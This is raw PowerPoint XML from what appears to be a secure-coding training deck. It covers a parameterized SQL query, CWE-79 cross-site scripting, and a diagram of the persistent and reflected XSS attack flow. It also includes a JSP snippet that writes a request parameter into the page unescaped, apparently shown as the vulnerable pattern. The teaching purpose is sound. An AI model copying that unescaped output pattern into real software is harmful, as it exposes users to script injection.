                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(1,strUser);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>12  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stmnt.setString</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(2,strPwd);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>13  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stmnt.execute</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>();</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Connector 6"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-685800" y="4419600"/>
              <a:ext cx="35052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639"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Data Validation Words to Live By: #2</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7" name="Horizontal Scroll 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107504" y="922175"/>
            <a:ext cx="60198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Validate data before sending back to the client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1844824"/>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CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)</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The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. </a:t>
            </a:r>
            <a:endParaRPr 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9278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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="1143000"/>
            <a:ext cx="1295400" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75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r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Smiley Face 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="4114800"/>
            <a:ext cx="1371600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFace">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>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Lightning Bolt 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="723900" y="4294632"/>
            <a:ext cx="1600200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="lightningBolt">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>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4" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970001" y="5340096"/>
            <a:ext cx="1107996" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737786" y="5532777"/>
            <a:ext cx="697627" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2324100" y="2590800"/>
            <a:ext cx="1485900" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494928" y="2072665"/>
            <a:ext cx="2736647" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Persistent XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>create malicious site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>malicious post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>vulnerable site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="193971" y="1524000"/>
            <a:ext cx="601913" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FDAA03"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2269236" y="5630495"/>
            <a:ext cx="601913" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FDAA03"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871221" y="5126063"/>
            <a:ext cx="2967479" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>- wait for user to visit site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>- send phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>email</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2395959" y="4837176"/>
            <a:ext cx="3700041" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5105400" y="2727972"/>
            <a:ext cx="1295400" cy="1566660"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="3067812"/>
            <a:ext cx="601913" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FDAA03"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4060971" y="3610942"/>
            <a:ext cx="1877437" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>- browse to site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>- clicks on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2438400"/>
            <a:ext cx="1251386" cy="1540365"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Oval 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6271307" y="1383428"/>
            <a:ext cx="601913" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FDAA03"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238611" y="1916828"/>
            <a:ext cx="2393604" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>attacker's code sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> to user and run in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> their browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>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P spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0"/>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98020" y="1113295"/>
            <a:ext cx="8153400" cy="1846053"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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strLabel</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"label"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>); </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>%&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;P&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Label: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;%=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>strLabel</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>%&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
